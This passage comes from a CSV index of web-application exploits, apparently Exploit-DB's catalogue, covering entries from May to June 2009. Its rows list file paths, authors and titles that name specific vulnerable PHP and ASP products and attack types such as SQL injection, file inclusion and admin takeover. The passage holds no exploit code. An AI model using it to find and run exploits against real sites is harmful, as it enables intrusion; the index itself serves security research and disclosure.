+8706,exploits/php/webapps/8706.pl,"PHPenpals 1.1 - 'mail.php?ID' SQL Injection",2009-05-15,Br0ly,webapps,php, +8707,exploits/php/webapps/8707.txt,"my-colex 1.4.2 - Authentication Bypass / SQL Injection / Cross-Site Scripting",2009-05-15,YEnH4ckEr,webapps,php, +8708,exploits/php/webapps/8708.txt,"my-gesuad 0.9.14 - Authentication Bypass / SQL Injection / Cross-Site Scripting",2009-05-15,YEnH4ckEr,webapps,php, +8709,exploits/php/webapps/8709.txt,"Pc4Uploader 9.0 - Blind SQL Injection",2009-05-18,Qabandi,webapps,php, +8710,exploits/php/webapps/8710.txt,"PHP Dir Submit - Authentication Bypass",2009-05-18,snakespc,webapps,php, +8711,exploits/php/webapps/8711.txt,"Online Rental Property Script 5.0 - 'pid' SQL Injection",2009-05-18,"UnderTaker HaCkEr",webapps,php, +8713,exploits/php/webapps/8713.txt,"coppermine photo Gallery 1.4.22 - Multiple Vulnerabilities",2009-05-18,girex,webapps,php, +8714,exploits/php/webapps/8714.txt,"Flyspeck CMS 6.8 - Local/Remote File Inclusion / Change Add Admin",2009-05-18,ahmadbady,webapps,php, +8715,exploits/php/webapps/8715.txt,"Pluck CMS 4.6.2 - 'langpref' Local File Inclusion",2009-05-18,ahmadbady,webapps,php, +8717,exploits/php/webapps/8717.txt,"ClanWeb 1.4.2 - Remote Change Password / Add Admin",2009-05-18,ahmadbady,webapps,php, +8718,exploits/php/webapps/8718.txt,"douran portal 3.9.0.23 - Multiple Vulnerabilities",2009-05-18,Abysssec,webapps,php, +8719,exploits/asp/webapps/8719.py,"Dana Portal - Remote Change Admin Password",2009-05-18,Abysssec,webapps,asp, +8724,exploits/php/webapps/8724.txt,"LightOpenCMS 0.1 - 'id' SQL Injection",2009-05-18,Mi4night,webapps,php, +8725,exploits/php/webapps/8725.php,"Jieqi CMS 1.5 - Remote Code Execution",2009-05-18,Securitylab.ir,webapps,php, +8726,exploits/asp/webapps/8726.txt,"MaxCMS 2.0 - '/inc/ajax.asp' SQL Injection",2009-05-18,Securitylab.ir,webapps,asp, +8727,exploits/php/webapps/8727.txt,"DGNews 3.0 Beta - 'id' SQL Injection",2009-05-18,Cyber-Zone,webapps,php, +8728,exploits/php/webapps/8728.html,"PHP Article Publisher - Remote Change Admin Password",2009-05-18,ahmadbady,webapps,php, +8730,exploits/php/webapps/8730.txt,"VidShare Pro - Arbitrary File Upload",2009-05-19,InjEctOr5,webapps,php, +8731,exploits/php/webapps/8731.php,"Joomla! Component com_gsticketsystem - 'catid' Blind SQL Injection",2009-05-19,InjEctOr5,webapps,php, +8734,exploits/asp/webapps/8734.txt,"Namad (IMenAfzar) 2.0.0.0 - Remote File Disclosure",2009-05-19,Securitylab.ir,webapps,asp, +8735,exploits/php/webapps/8735.txt,"PAD Site Scripts 3.6 - Insecure Cookie Handling",2009-05-19,Mr.tro0oqy,webapps,php, +8736,exploits/php/webapps/8736.pl,"Coppermine Photo Gallery 1.4.22 - SQL Injection",2009-05-19,girex,webapps,php, +8737,exploits/php/webapps/8737.txt,"vidshare pro - SQL Injection / Cross-Site Scripting",2009-05-19,snakespc,webapps,php, +8738,exploits/php/webapps/8738.txt,"Dog Pedigree Online Database 1.0.1b - Multiple SQL Injections",2009-05-19,YEnH4ckEr,webapps,php, +8739,exploits/php/webapps/8739.txt,"Dog Pedigree Online Database 1.0.1b - Insecure Cookie Handling",2009-05-19,YEnH4ckEr,webapps,php, +8740,exploits/php/webapps/8740.pl,"Dog Pedigree Online Database 1.0.1b - Blind SQL Injection",2009-05-19,YEnH4ckEr,webapps,php, +8741,exploits/php/webapps/8741.txt,"DM FileManager 3.9.2 - Authentication Bypass",2009-05-19,snakespc,webapps,php, +8743,exploits/php/webapps/8743.txt,"Joomla! Component Casino 0.3.1 - Multiple SQL Injections s",2009-05-20,ByALBAYX,webapps,php, +8744,exploits/php/webapps/8744.txt,"Exjune Officer Message System 1 - Multiple Vulnerabilities",2009-05-20,ByALBAYX,webapps,php, +8745,exploits/php/webapps/8745.txt,"Catviz 0.4.0 beta1 - Local File Inclusion / Cross-Site Scripting",2009-05-20,ByALBAYX,webapps,php, +8746,exploits/php/webapps/8746.txt,"NC GBook 1.0 - Remote Command Injection",2009-05-20,"ThE g0bL!N",webapps,php, +8747,exploits/php/webapps/8747.txt,"NC LinkList 1.3.1 - Remote Command Injection",2009-05-20,"ThE g0bL!N",webapps,php, +8748,exploits/php/webapps/8748.txt,"Realty Web-Base 1.0 - 'list_list.php?id' SQL Injection",2009-05-20,"ThE g0bL!N",webapps,php, +8749,exploits/asp/webapps/8749.txt,"DMXReady Registration Manager 1.1 - Arbitrary File Upload",2009-05-20,Securitylab.ir,webapps,asp, +8750,exploits/php/webapps/8750.txt,"PHP Article Publisher - Arbitrary Authentication Bypass",2009-05-20,"ThE g0bL!N",webapps,php, +8751,exploits/php/webapps/8751.txt,"bSpeak 1.10 - 'forumid' Blind SQL Injection",2009-05-20,snakespc,webapps,php, +8752,exploits/php/webapps/8752.txt,"Jorp 1.3.05.09 - Arbitrary Remove Projects/Tasks",2009-05-20,YEnH4ckEr,webapps,php, +8755,exploits/php/webapps/8755.txt,"VICIDIAL 2.0.5-173 - Authentication Bypass",2009-05-21,Striker7,webapps,php, +8756,exploits/asp/webapps/8756.txt,"asp inline Corporate Calendar - SQL Injection / Cross-Site Scripting",2009-05-21,Bl@ckbe@rD,webapps,asp, +8759,exploits/php/webapps/8759.txt,"Flash Quiz Beta 2 - Multiple SQL Injections",2009-05-21,YEnH4ckEr,webapps,php, +8761,exploits/php/webapps/8761.txt,"Article Directory - Authentication Bypass",2009-05-21,Hakxer,webapps,php, +8762,exploits/php/webapps/8762.txt,"Article Directory - 'page.php' Blind SQL Injection",2009-05-21,"ThE g0bL!N",webapps,php, +8763,exploits/php/webapps/8763.txt,"ZaoCMS - Insecure Cookie Handling",2009-05-21,"ThE g0bL!N",webapps,php, +8764,exploits/php/webapps/8764.txt,"ZaoCMS - 'download.php' Remote File Disclosure",2009-05-21,"ThE g0bL!N",webapps,php, +8766,exploits/php/webapps/8766.txt,"Tutorial Share 3.5.0 - Insecure Cookie Handling",2009-05-22,Evil-Cod3r,webapps,php, +8769,exploits/php/webapps/8769.txt,"ZaoCMS - 'user_id' SQL Injection",2009-05-22,Qabandi,webapps,php, +8771,exploits/php/webapps/8771.html,"ZaoCMS - 'user_updated.php' Remote Change Password",2009-05-22,"ThE g0bL!N",webapps,php, +8773,exploits/php/webapps/8773.txt,"ZaoCMS (PhpCommander) - Arbitrary File Upload",2009-05-22,Qabandi,webapps,php, +8774,exploits/php/webapps/8774.html,"Mole Group Sky Hunter/Bus Ticket Scripts - Change Admin Password",2009-05-22,G4N0K,webapps,php, +8775,exploits/php/webapps/8775.txt,"Mole Group Restaurant Directory Script 3.0 - Change Admin Password",2009-05-22,G4N0K,webapps,php, +8776,exploits/php/webapps/8776.txt,"photovideotube 1.11 - Multiple Vulnerabilities",2009-05-22,Hakxer,webapps,php, +8778,exploits/php/webapps/8778.txt,"minitwitter 0.3-beta - SQL Injection / Cross-Site Scripting",2009-05-26,YEnH4ckEr,webapps,php, +8779,exploits/php/webapps/8779.txt,"Joomla! Component Boy Scout Advancement 0.3 - 'id' SQL Injection",2009-05-26,YEnH4ckEr,webapps,php, +8781,exploits/php/webapps/8781.txt,"Dokuwiki 2009-02-14 - Local File Inclusion",2009-05-26,girex,webapps,php, +8784,exploits/php/webapps/8784.txt,"vBulletin vbBux/vbPlaza 2.x - 'vbplaza.php' Blind SQL Injection",2009-05-26,"Cold Zero",webapps,php, +8785,exploits/asp/webapps/8785.txt,"Cute Editor ASP.NET - Remote File Disclosure",2009-05-26,Securitylab.ir,webapps,asp, +8787,exploits/php/webapps/8787.txt,"MyFirstCMS 1.0.2 - Arbitrary File Delete",2009-05-26,darkjoker,webapps,php, +8788,exploits/php/webapps/8788.txt,"Mole Adult Portal Script - 'profile.php?user_id' SQL Injection",2009-05-26,Qabandi,webapps,php, +8790,exploits/php/webapps/8790.pl,"CPCommerce 1.2.x - 'GLOBALS[prefix]' Arbitrary File Inclusion",2009-05-26,StAkeR,webapps,php, +8791,exploits/php/webapps/8791.txt,"WordPress Plugin Lytebox - 'wp-lytebox' Local File Inclusion",2009-05-26,TurkGuvenligi,webapps,php, +8792,exploits/php/webapps/8792.txt,"Webradev Download Protect 1.0 - Remote File Inclusion",2009-05-26,asL-Sabia,webapps,php, +8793,exploits/php/webapps/8793.txt,"eZoneScripts Hotornot2 Script - (Authentication Bypass) Multiple Remote Vulnerabilities",2009-05-26,"sniper code",webapps,php, +8795,exploits/php/webapps/8795.html,"Ultimate Media Script 2.0 - Remote Change Content",2009-05-26,"ThE g0bL!N",webapps,php, +8796,exploits/php/webapps/8796.html,"Gallarific - 'user.php' Arbirary Change Admin Information",2009-05-26,TiGeR-Dz,webapps,php, +8797,exploits/php/webapps/8797.txt,"roomphplanning 1.6 - Multiple Vulnerabilities",2009-05-26,"ThE g0bL!N",webapps,php, +8801,exploits/php/webapps/8801.txt,"Joomla! Component com_rsgallery2 1.14.x/2.x - Remote Backdoor",2009-05-26,"Jan Van Niekerk",webapps,php, +8802,exploits/php/webapps/8802.txt,"Kensei Board 2.0.0b - Multiple SQL Injections",2009-05-26,cOndemned,webapps,php, +8803,exploits/php/webapps/8803.txt,"MyForum 1.3 - Authentication Bypass",2009-05-26,"ThE g0bL!N",webapps,php, +8805,exploits/php/webapps/8805.txt,"Flash Image Gallery 1.1 - Arbitrary Configuration File Disclosure",2009-05-26,DarkbiteX,webapps,php, +8807,exploits/php/webapps/8807.html,"ShaadiClone 2.0 - 'addAdminmembercode.php' Arbitrary Add Admin",2009-05-26,x.CJP.x,webapps,php, +8808,exploits/php/webapps/8808.txt,"phpBugTracker 1.0.3 - Authentication Bypass",2009-05-26,ByALBAYX,webapps,php, +8809,exploits/php/webapps/8809.html,"ZeeCareers 2.0 - 'addAdminmembercode.php' Arbitrary Add Admin",2009-05-26,x.CJP.x,webapps,php, +8810,exploits/php/webapps/8810.txt,"WebMember 1.0 - 'formID' SQL Injection",2009-05-26,KIM,webapps,php, +8811,exploits/php/webapps/8811.txt,"Joomla! Component Com_Agora 3.0.0 RC1 - Arbitrary File Upload",2009-05-26,ByALBAYX,webapps,php, +8812,exploits/php/webapps/8812.txt,"Dokuwiki 2009-02-14 - Temporary/Remote File Inclusion",2009-05-26,Nine:Situations:Group,webapps,php, +8813,exploits/php/webapps/8813.txt,"Million Dollar Text Links 1.x - Insecure Cookie Handling",2009-05-27,HxH,webapps,php, +8814,exploits/php/webapps/8814.txt,"Joomla! Component AgoraGroup 0.3.5.3 - Blind SQL Injection",2009-05-27,"Chip d3 bi0s",webapps,php, +8815,exploits/php/webapps/8815.txt,"Easy Px 41 CMS 09.00.00B1 - 'fiche' Local File Inclusion",2009-05-27,"ThE g0bL!N",webapps,php, +8816,exploits/php/webapps/8816.txt,"SiteX 0.7.4.418 - 'THEME_FOLDER' Local File Inclusion",2009-05-27,ahmadbady,webapps,php, +8817,exploits/php/webapps/8817.txt,"Evernew Free Joke Script 1.2 - 'cat_id' SQL Injection",2009-05-27,taRentReXx,webapps,php, +8818,exploits/php/webapps/8818.txt,"Impact Software AdPeeps 8.5d1 - Cross-Site Scripting / HTML Injection",2009-05-27,intern0t,webapps,php, +8819,exploits/php/webapps/8819.txt,"small pirate 2.1 - Cross-Site Scripting / SQL Injection",2009-05-29,YEnH4ckEr,webapps,php, +8820,exploits/php/webapps/8820.txt,"amember 3.1.7 - Cross-Site Scripting / SQL Injection / HTML Injection",2009-05-29,intern0t,webapps,php, +8821,exploits/php/webapps/8821.txt,"Joomla! Component JVideo 0.3.x - SQL Injection",2009-05-29,"Chip d3 bi0s",webapps,php, +8823,exploits/php/webapps/8823.txt,"212Cafe WebBoard 2.90 Beta - Remote File Disclosure",2009-05-29,MrDoug,webapps,php, +8825,exploits/php/webapps/8825.txt,"Zen Help Desk 2.1 - Authentication Bypass",2009-05-29,TiGeR-Dz,webapps,php, +8827,exploits/php/webapps/8827.txt,"ecshop 2.6.2 - Multiple Remote Command Execution Vulnerabilities",2009-05-29,Securitylab.ir,webapps,php, +8828,exploits/php/webapps/8828.txt,"Arab Portal 2.2 - Authentication Bypass",2009-05-29,"sniper code",webapps,php, +8829,exploits/php/webapps/8829.txt,"ZeusCart 2.3 - 'maincatid' SQL Injection",2009-05-29,Br0ly,webapps,php, +8830,exploits/php/webapps/8830.txt,"Million Dollar Text Links 1.0 - 'id' SQL Injection",2009-05-29,Qabandi,webapps,php, +8831,exploits/php/webapps/8831.txt,"Traidnt Up 2.0 - Cookie Authentication Bypass",2009-05-29,Qabandi,webapps,php, +8834,exploits/php/webapps/8834.pl,"RadCLASSIFIEDS Gold 2 - 'seller' SQL Injection",2009-06-01,Br0ly,webapps,php, +8836,exploits/php/webapps/8836.txt,"OCS Inventory NG 1.02 - Multiple SQL Injections",2009-06-01,"Nico Leidecker",webapps,php, +8838,exploits/php/webapps/8838.txt,"elitecms 1.01 - SQL Injection / Cross-Site Scripting",2009-06-01,xeno_hive,webapps,php, +8839,exploits/php/webapps/8839.txt,"Open-school 1.0 - 'id' SQL Injection",2009-06-01,OzX,webapps,php, +8840,exploits/php/webapps/8840.txt,"Escon SupportPortal Pro 3.0 - 'tid' Blind SQL Injection",2009-06-01,OzX,webapps,php, +8841,exploits/php/webapps/8841.txt,"unclassified NewsBoard 1.6.4 - Multiple Vulnerabilities",2009-06-01,girex,webapps,php, +8843,exploits/php/webapps/8843.pl,"Online Grades & Attendance 3.2.6 - Credentials Changer SQL",2009-06-01,YEnH4ckEr,webapps,php, +8844,exploits/php/webapps/8844.txt,"Online Grades & Attendance 3.2.6 - Multiple SQL Injections",2009-06-01,YEnH4ckEr,webapps,php, +8847,exploits/php/webapps/8847.txt,"Joomla! Component Joomlaequipment (com_juser) 2.0.4 - SQL Injection",2009-06-01,"Chip d3 bi0s",webapps,php, +8848,exploits/php/webapps/8848.txt,"ecsportal rel 6.5 - 'article_view_photo.php?id' SQL Injection",2009-06-01,taRentReXx,webapps,php, +8849,exploits/asp/webapps/8849.txt,"R2 NewsLetter Lite/Pro/Stats - 'admin.mdb' Database Disclosure",2009-06-01,TiGeR-Dz,webapps,asp, +8850,exploits/php/webapps/8850.txt,"PAD Site Scripts 3.6 - Arbitrary Database Backup",2009-06-01,TiGeR-Dz,webapps,php, +8851,exploits/php/webapps/8851.txt,"AdaptBB 1.0 - 'forumspath' Remote File Inclusion",2009-06-01,"Mehmet Ince",webapps,php, +8852,exploits/php/webapps/8852.txt,"ASP Football Pool 2.3 - Remote Database Disclosure",2009-06-01,ByALBAYX,webapps,php, +8853,exploits/php/webapps/8853.txt,"Online Grades & Attendance 3.2.6 - Multiple Local File Inclusions",2009-06-02,YEnH4ckEr,webapps,php, +8854,exploits/php/webapps/8854.pl,"Online Grades & Attendance 3.2.6 - Blind SQL Injection",2009-06-02,YEnH4ckEr,webapps,php, +8855,exploits/php/webapps/8855.txt,"Alstrasoft Article Manager Pro - Arbitrary File Upload",2009-06-02,ZoRLu,webapps,php, +8856,exploits/php/webapps/8856.txt,"flashlight free edition - Local File Inclusion / SQL Injection",2009-06-02,K4m1k451,webapps,php, +8857,exploits/php/webapps/8857.txt,"WebCal - 'webCal3_detail.asp?event_id' SQL Injection",2009-06-02,Bl@ckbe@rD,webapps,php, +8858,exploits/php/webapps/8858.txt,"propertymax pro free - SQL Injection / Cross-Site Scripting",2009-06-02,SirGod,webapps,php, +8859,exploits/asp/webapps/8859.txt,"WebEyes Guest Book 3 - 'yorum.asp?mesajid' SQL Injection",2009-06-02,Bl@ckbe@rD,webapps,asp, +8860,exploits/php/webapps/8860.txt,"Podcast Generator 1.2 - 'GLOBALS[]' Multiple Vulnerabilities",2009-06-02,StAkeR,webapps,php, +8864,exploits/php/webapps/8864.txt,"My Mini Bill - 'orderid' SQL Injection",2009-06-03,"ThE g0bL!N",webapps,php, +8865,exploits/php/webapps/8865.txt,"EgyPlus 7ml 1.0.1 - Authentication Bypass",2009-06-03,Qabandi,webapps,php, +8866,exploits/php/webapps/8866.php,"Podcast Generator 1.2 - Unauthorized Re-Installation",2009-06-03,StAkeR,webapps,php, +8867,exploits/php/webapps/8867.pl,"Joomla! Component Seminar 1.28 - 'id' Blind SQL Injection",2009-06-03,"ThE g0bL!N",webapps,php, +8868,exploits/php/webapps/8868.txt,"OCS Inventory NG 1.02 - Remote File Disclosure",2009-06-03,"Nico Leidecker",webapps,php, +8869,exploits/php/webapps/8869.txt,"Supernews 2.6 - 'index.php?noticia' SQL Injection",2009-06-03,DD3str0y3r,webapps,php, +8870,exploits/php/webapps/8870.txt,"Joomla! Component Omilen Photo Gallery 0.5b - Local File Inclusion",2009-06-03,ByALBAYX,webapps,php, +8871,exploits/php/webapps/8871.txt,"Movie PHP Script 2.0 - 'init.php?anticode' Code Execution",2009-06-03,SirGod,webapps,php, +8872,exploits/php/webapps/8872.txt,"Joomla! Component com_mosres - Multiple SQL Injections",2009-06-03,"Chip d3 bi0s",webapps,php, +8874,exploits/php/webapps/8874.txt,"SuperCali PHP Event Calendar - Arbitrary Change Admin Password",2009-06-04,TiGeR-Dz,webapps,php, +8876,exploits/php/webapps/8876.html,"Web Directory PRO - 'Admins.php' Change Admin Password",2009-06-04,TiGeR-Dz,webapps,php, +8877,exploits/php/webapps/8877.txt,"Host Directory PRO 2.1.0 - Remote Database Backup",2009-06-04,ZoRLu,webapps,php, +8878,exploits/php/webapps/8878.txt,"Web Directory PRO - Remote Database Backup",2009-06-04,TiGeR-Dz,webapps,php, +8879,exploits/php/webapps/8879.html,"Host Directory PRO 2.1.0 - Remote Change Admin Password",2009-06-04,TiGeR-Dz,webapps,php, +8882,exploits/php/webapps/8882.txt,"Pixelactivo 3.0 - 'idx' SQL Injection",2009-06-05,snakespc,webapps,php, +8883,exploits/php/webapps/8883.txt,"Pixelactivo 3.0 - Authentication Bypass",2009-06-05,"ThE g0bL!N",webapps,php, +8884,exploits/php/webapps/8884.txt,"Kjtechforce mailman b1 - Delete Row 'code' SQL Injection",2009-06-05,YEnH4ckEr,webapps,php, +8885,exploits/php/webapps/8885.pl,"Kjtechforce mailman b1 - 'dest' Blind SQL Injection",2009-06-05,YEnH4ckEr,webapps,php, +8886,exploits/php/webapps/8886.txt,"MyCars Automotive - Authentication Bypass",2009-06-08,snakespc,webapps,php, +8889,exploits/asp/webapps/8889.txt,"VT-Auth 1.0 - 'zHk8dEes3.txt' File Disclosure",2009-06-08,ByALBAYX,webapps,asp, +8890,exploits/asp/webapps/8890.txt,"FipsCMS Light 2.1 - 'db.mdb' Remote Database Disclosure",2009-06-08,ByALBAYX,webapps,asp, +8891,exploits/php/webapps/8891.txt,"Joomla! Component com_school 1.4 - 'classid' SQL Injection",2009-06-08,"Chip d3 bi0s",webapps,php, +8892,exploits/php/webapps/8892.txt,"Virtue Classifieds - 'category' SQL Injection",2009-06-08,OzX,webapps,php, +8893,exploits/php/webapps/8893.txt,"Virtue Book Store - 'cid' SQL Injection",2009-06-08,OzX,webapps,php, +8894,exploits/php/webapps/8894.txt,"Virtue Shopping Mall - 'cid' SQL Injection",2009-06-08,OzX,webapps,php, +8895,exploits/cgi/webapps/8895.txt,"Interlogy Profile Manager Basic - Insecure Cookie Handling",2009-06-08,ZoRLu,webapps,cgi, +8898,exploits/php/webapps/8898.txt,"Joomla! Component MooFAQ (com_moofaq) - Local File Inclusion",2009-06-08,"Chip d3 bi0s",webapps,php, +8900,exploits/php/webapps/8900.txt,"Frontis 3.9.01.24 - 'source_class' SQL Injection",2009-06-08,snakespc,webapps,php, +8901,exploits/php/webapps/8901.txt,"virtue news - SQL Injection / Cross-Site Scripting",2009-06-08,snakespc,webapps,php, +8902,exploits/php/webapps/8902.html,"Grestul 1.2 - Remote Add Administrator Account",2009-06-08,"ThE g0bL!N",webapps,php, +8903,exploits/php/webapps/8903.txt,"DM FileManager 3.9.2 - Insecure Cookie Handling",2009-06-08,"ThE g0bL!N",webapps,php, +8904,exploits/php/webapps/8904.txt,"Automated link exchange portal 1.3 - Multiple Vulnerabilities",2009-06-08,TiGeR-Dz,webapps,php, +8905,exploits/php/webapps/8905.txt,"Joomla! Component com_portafolio - 'cid' SQL Injection",2009-06-08,"Chip d3 bi0s",webapps,php, +8906,exploits/php/webapps/8906.pl,"Shop Script Pro 2.12 - SQL Injection",2009-06-08,Ams,webapps,php, +8908,exploits/php/webapps/8908.txt,"Joomla! Component BookLibrary 1.5.2.4 - Remote File Inclusion",2009-06-09,"Mehmet Ince",webapps,php, +8911,exploits/php/webapps/8911.txt,"Joomla! Component Akobook 2.3 - 'gbid' SQL Injection",2009-06-09,Ab1i,webapps,php, +8912,exploits/php/webapps/8912.txt,"Joomla! Component com_media_library 1.5.3 - Remote File Inclusion",2009-06-09,"Mehmet Ince",webapps,php, +8913,exploits/php/webapps/8913.txt,"S-CMS 2.0b3 - Multiple Local File Inclusions",2009-06-09,YEnH4ckEr,webapps,php, +8914,exploits/php/webapps/8914.txt,"S-CMS 2.0b3 - Multiple SQL Injections",2009-06-09,YEnH4ckEr,webapps,php, +8915,exploits/php/webapps/8915.pl,"S-CMS 2.0b3 - 'Username' Blind SQL Injection",2009-06-09,YEnH4ckEr,webapps,php, +8917,exploits/php/webapps/8917.txt,"mrcgiguy the ticket system 2.0 PHP - Multiple Vulnerabilities",2009-06-09,"ThE g0bL!N",webapps,php, +8918,exploits/php/webapps/8918.txt,"MRCGIGUY Hot Links - 'report.php?id' SQL Injection",2009-06-09,"ThE g0bL!N",webapps,php, +8919,exploits/php/webapps/8919.txt,"Joomla! Component com_realestatemanager 1.0 - Remote File Inclusion",2009-06-09,"Mehmet Ince",webapps,php, +8920,exploits/php/webapps/8920.txt,"Joomla! Component com_vehiclemanager 1.0 - Remote File Inclusion",2009-06-09,"Mehmet Ince",webapps,php, +8921,exploits/php/webapps/8921.sh,"phpMyAdmin - '/scripts/setup.php' PHP Code Injection",2009-06-09,"Adrian _pagvac_ Pastor",webapps,php, +8923,exploits/php/webapps/8923.txt,"LightNEasy sql/no-db 2.2.x - System Configuration Disclosure",2009-06-10,StAkeR,webapps,php, +8924,exploits/php/webapps/8924.txt,"School Data Navigator - 'page' Local/Remote File Inclusion",2009-06-10,Br0ly,webapps,php, +8925,exploits/php/webapps/8925.txt,"Desi Short URL Script - (Authentication Bypass) Insecure Cookie Handling",2009-06-10,N@bilX,webapps,php, +8926,exploits/php/webapps/8926.txt,"mrcgiguy freeticket - Cookie Handling / SQL Injection",2009-06-10,"ThE g0bL!N",webapps,php, +8927,exploits/php/webapps/8927.pl,"Open Biller 0.1 - 'Username' Blind SQL Injection",2009-06-10,YEnH4ckEr,webapps,php, +8928,exploits/php/webapps/8928.txt,"PHPWebThings 1.5.2 - 'help.php?module' Local File Inclusion",2009-06-11,Br0ly,webapps,php, +8929,exploits/php/webapps/8929.txt,"Splog 1.2 Beta - Multiple SQL Injections",2009-06-11,YEnH4ckEr,webapps,php, +8931,exploits/php/webapps/8931.txt,"TorrentVolve 1.4 - 'deleteTorrent' Delete Arbitrary File",2009-06-11,Br0ly,webapps,php, +8932,exploits/php/webapps/8932.txt,"yogurt 0.3 - Cross-Site Scripting / SQL Injection",2009-06-11,Br0ly,webapps,php, +8933,exploits/php/webapps/8933.php,"Sniggabo CMS - 'article.php?id' SQL Injection",2009-06-11,Lidloses_Auge,webapps,php, +8935,exploits/php/webapps/8935.txt,"Zip Store Chat 4.0/5.0 - Authentication Bypass",2009-06-12,ByALBAYX,webapps,php, +8936,exploits/php/webapps/8936.txt,"4Images 1.7.7 - Filter Bypass HTML Injection / Cross-Site Scripting",2009-06-12,Qabandi,webapps,php, +8937,exploits/php/webapps/8937.txt,"campus virtual-lms - Cross-Site Scripting / SQL Injection",2009-06-12,Yasión,webapps,php, +8939,exploits/php/webapps/8939.pl,"phpWebThings 1.5.2 - MD5 Hash Retrieve/File Disclosure",2009-06-12,StAkeR,webapps,php, +8941,exploits/php/webapps/8941.txt,"pivot 1.40.4-7 - Multiple Vulnerabilities",2009-06-12,intern0t,webapps,php, +8942,exploits/php/webapps/8942.txt,"tbdev 01-01-2008 - Multiple Vulnerabilities",2009-06-12,intern0t,webapps,php, +8943,exploits/php/webapps/8943.txt,"TransLucid 1.75 - Multiple Vulnerabilities",2009-06-12,intern0t,webapps,php, +8944,exploits/php/webapps/8944.txt,"Uebimiau Web-Mail 3.2.0-1.8 - Remote File / Overwrite",2009-06-12,GoLd_M,webapps,php, +8946,exploits/php/webapps/8946.txt,"Joomla! Component com_Projectfork 2.0.10 - Local File Inclusion",2009-06-15,ByALBAYX,webapps,php, +8947,exploits/php/webapps/8947.txt,"impleo music Collection 2.0 - SQL Injection / Cross-Site Scripting",2009-06-15,SirGod,webapps,php, +8948,exploits/php/webapps/8948.txt,"Mundi Mail 0.8.2 - 'top' Remote File Inclusion",2009-06-15,Br0ly,webapps,php, +8949,exploits/php/webapps/8949.txt,"SugarCRM 5.2.0e - Remote Code Execution",2009-06-15,USH,webapps,php, +8950,exploits/php/webapps/8950.txt,"formmail 1.92 - Multiple Vulnerabilities",2009-06-15,USH,webapps,php, +8951,exploits/php/webapps/8951.php,"DB Top Sites 1.0 - Remote Command Execution",2009-06-15,SirGod,webapps,php, +8952,exploits/php/webapps/8952.txt,"DB Top Sites 1.0 - 'index.php?u' Local File Inclusion",2009-06-15,SirGod,webapps,php, +8953,exploits/php/webapps/8953.txt,"elvin bts 1.2.0 - Multiple Vulnerabilities",2009-06-15,SirGod,webapps,php, +8954,exploits/php/webapps/8954.txt,"adaptweb 0.9.2 - Local File Inclusion / SQL Injection",2009-06-15,SirGod,webapps,php, +8956,exploits/php/webapps/8956.html,"Evernew Free Joke Script 1.2 - Remote Change Password",2009-06-15,Hakxer,webapps,php, +8958,exploits/php/webapps/8958.txt,"TorrentTrader Classic 1.09 - Multiple Vulnerabilities",2009-06-15,waraxe,webapps,php, +8959,exploits/php/webapps/8959.pl,"Joomla! Component com_iJoomla_rss - Blind SQL Injection",2009-06-15,"Mehmet Ince",webapps,php, +8961,exploits/php/webapps/8961.txt,"WordPress Plugin Photoracer 1.0 - 'id' SQL Injection",2009-06-15,Kacper,webapps,php, +8962,exploits/php/webapps/8962.txt,"PHPCollegeExchange 0.1.5c - 'listing_view.php?itemnr' SQL Injection",2009-06-15,SirGod,webapps,php, +8965,exploits/php/webapps/8965.txt,"vBulletin Radio and TV Player AddOn - HTML Injection",2009-06-15,d3v1l,webapps,php, +8966,exploits/php/webapps/8966.txt,"PHPortal 1 - 'topicler.php?id' SQL Injection",2009-06-15,"Mehmet Ince",webapps,php, +8967,exploits/php/webapps/8967.txt,"The Recipe Script 5 - Cross-Site Scripting",2009-06-15,"ThE g0bL!N",webapps,php, +8968,exploits/php/webapps/8968.txt,"Joomla! Component Jumi - 'fileid' Blind SQL Injection",2009-06-15,"Chip d3 bi0s",webapps,php, +8974,exploits/php/webapps/8974.txt,"XOOPS 2.3.3 - '.htaccess' Remote File Disclosure",2009-06-16,daath,webapps,php, +8975,exploits/php/webapps/8975.txt,"PHPFK 7.03 - 'page_bottom.php' Local File Inclusion",2009-06-17,ahmadbady,webapps,php, +8977,exploits/php/webapps/8977.txt,"TekBase All-in-One 3.1 - Multiple SQL Injections",2009-06-17,n3wb0ss,webapps,php, +8978,exploits/php/webapps/8978.txt,"Fuzzylime CMS 3.03a - Local Inclusion / Arbitrary File Corruption (PoC)",2009-06-17,StAkeR,webapps,php, +8979,exploits/php/webapps/8979.txt,"FretsWeb 1.2 - Multiple Local File Inclusions",2009-06-17,YEnH4ckEr,webapps,php, +8980,exploits/php/webapps/8980.py,"FretsWeb 1.2 - 'name' Blind SQL Injection",2009-06-17,YEnH4ckEr,webapps,php, +8981,exploits/php/webapps/8981.txt,"PHPortal 1.0 - Insecure Cookie Handling",2009-06-17,KnocKout,webapps,php, +8984,exploits/php/webapps/8984.txt,"CMS buzz - Cross-Site Scripting / Password Change / HTML Injection",2009-06-18,"ThE g0bL!N",webapps,php, +8987,exploits/cgi/webapps/8987.txt,"MIDAS 1.43 - (Authentication Bypass) Insecure Cookie Handling",2009-06-22,HxH,webapps,cgi, +8988,exploits/php/webapps/8988.txt,"pc4 Uploader 10.0 - Remote File Disclosure",2009-06-22,Qabandi,webapps,php, +8990,exploits/php/webapps/8990.txt,"phpDatingClub 3.7 - SQL Injection / Cross-Site Scripting Injection",2009-06-22,"ThE g0bL!N",webapps,php, +8992,exploits/php/webapps/8992.php,"phpMyAdmin - 'pmaPWN!' Code Injection / Remote Code Execution",2009-06-22,"Hacking Expose!",webapps,php, +8993,exploits/php/webapps/8993.txt,"elgg - Cross-Site Scripting / Cross-Site Request Forgery / Change Password",2009-06-22,lorddemon,webapps,php, +8994,exploits/php/webapps/8994.txt,"AWScripts Gallery Search Engine 1.x - Insecure Cookie",2009-06-22,TiGeR-Dz,webapps,php, +8995,exploits/php/webapps/8995.txt,"Campsite 3.3.0 RC1 - Multiple Remote File Inclusions",2009-06-22,CraCkEr,webapps,php, +8996,exploits/php/webapps/8996.txt,"Gravy Media Photo Host 1.0.8 - Local File Disclosure",2009-06-22,Lo$er,webapps,php, +8997,exploits/php/webapps/8997.txt,"Kasseler CMS - File Disclosure / Cross-Site Scripting",2009-06-22,S(r1pt,webapps,php, +8998,exploits/php/webapps/8998.txt,"SourceBans 1.4.2 - Arbitrary Change Admin Email",2009-06-22,"Mr. Anonymous",webapps,php, +8999,exploits/php/webapps/8999.txt,"Joomla! Component com_tickets 2.1 - 'id' SQL Injection",2009-06-22,"Chip d3 bi0s",webapps,php, +9000,exploits/php/webapps/9000.txt,"RS-CMS 2.1 - 